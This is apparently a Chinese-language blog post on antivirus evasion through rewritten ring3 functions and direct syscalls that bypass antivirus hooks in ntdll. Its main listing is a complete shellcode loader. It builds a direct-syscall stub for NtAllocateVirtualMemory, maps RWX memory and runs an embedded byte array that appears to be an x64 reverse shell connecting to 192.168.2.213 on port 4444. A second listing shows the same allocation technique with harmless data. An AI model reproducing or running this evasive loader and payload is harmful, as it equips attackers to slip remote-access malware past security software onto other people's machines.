r3层函数重写

简介

r3 层重写函数的主要目的就是为了隐藏api 的调用

由于杀毒软件会对重要的dll 进行一个hook 添加一个消息机制

只要调用了某一个函数，就会发送消息到杀软上，如果这个时候我们利用自己的手法进行重写某一些函数调用过程，那么也就可以相对来说避免了一些特征

前情提要

ntdll

ntdll.dll 是 Windows 操作系统中的一个关键系统文件，它包含了许多低级别的操作系统功能。这个动态链接库（DLL）是用户模式下最重要的系统组件之一，为应用程序和其它系统 DLL 提供了访问核心操作系统服务的接口。

VirtualAlloc

可以先简单的尝试分析一下VirtualAlloc 的调用过程

1. 明确VirtualAlloc 存在于哪个dll

   可以通过微软官方的提供的一个文档进行查询

   VirtualAlloc 函数 （memoryapi.h） - Win32 apps | Microsoft Learn

   

2. 知道dll 之后，看函数的逻辑

   将kernel32.dll 直接拖入ida

   找到导出表之后，通过搜寻virtualAlloc

   

   但是kernel32.dll 最终获取的一个函数，都是从kernelbase 中进行获取的

3. Kernelbase.dll

   找到kenel32.dll 之后就会发现还调用了其他的函数

   

   最后这个函数在导入表中，尝试对导入表进行分析

   

   存在于ntdll

   那么直接看这个dll 中的内容

4. n tdll

   

   可以发现其实就两个方式进行调用，是否支持syscall 的方式

   如果支持就直接走syscall 进行调用

   不支持就走中断的方式

ntdll 重写的r3层

源.cpp · cutecuteyu/r3重写函数 - 码云 - 开源中国 (gitee.com)

#include <Windows.h>
#include <stdio.h>
#include <tchar.h>
#pragma comment(linker, "/section:.data,RWE")//.dataοִ

CHAR FuncExample[] = {
	0x4c,0x8b,0xd1,			  //mov r10,rcx
	0xb8,0x18,0x00,0x00,0x00, //mov eax,018h
	0x0f,0x05,				  //syscall
	0xc3					  //ret
};

typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(//ָ
	HANDLE ProcessHandle,
	PVOID* BaseAddress,
	ULONG_PTR ZeroBits,
	PSIZE_T RegionSize,
	ULONG AllocationType,
	ULONG Protect);


DOUBLE GetAndSetSysCall(TCHAR* szFuncName) {
	DWORD SysCallid = 0;
	HMODULE hModule = GetModuleHandle(_T("ntdll.dll"));
	DWORD64 FuncAddr = (DWORD64)GetProcAddress(hModule, (LPCSTR)szFuncName);
	LPVOID CallAddr = (LPVOID)(FuncAddr + 4);
	ReadProcessMemory(GetCurrentProcess(), CallAddr, &SysCallid, 4, NULL);
	memcpy(FuncExample + 4, (CHAR*)&SysCallid, 2);
	return (DOUBLE)SysCallid;
}
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0"
"\x41\x51\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b"
"\x40\x20\x50\x8b\x48\x18\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x02\xd5\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
int main() {
	LPVOID Address = NULL;
	SIZE_T uSize = sizeof(buf);
	DOUBLE call = GetAndSetSysCall((TCHAR*)"NtAllocateVirtualMemory");
	pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)&FuncExample;
	NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &Address, 0, &uSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlMoveMemory(Address, buf, sizeof(buf));
	HANDLE hand = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)Address,0,0,0);
	WaitForSingleObject(hand,INFINITE);

	
	return 0;

}

kernel32 的重写

通过重写ring3 API函数实现免杀 | idiotc4t’s blog

#include <Windows.h>
#include <stdio.h>

EXTERN_C NTSTATUS NTAPI NtAllocateVirtualMemoryProc(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
typedef NTSTATUS (NTAPI* pNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
//typedef NTSTATUS (NTAPI* pZwWriteVirtualMemory)(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);

int main() {


    pNtAllocateVirtualMemory NtAllocateVirtualMemory = &NtAllocateVirtualMemoryProc;
    LPVOID Address = NULL;
    SIZE_T uSize = 0x1000;
    HANDLE hProcess = GetCurrentProcess();
    NTSTATUS status = NtAllocateVirtualMemory(hProcess, &Address, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
    if (status != 0) {
       return FALSE;
    }
    char a[] = "hello world\n";
    WriteProcessMemory(hProcess, Address, a, sizeof(a), 0);


    return 0;
}

总结

由于这个根本措施是隐藏iat和防止nedll的杀软消息hook

隐藏iat 更简单的方式就是使用动态调用的方式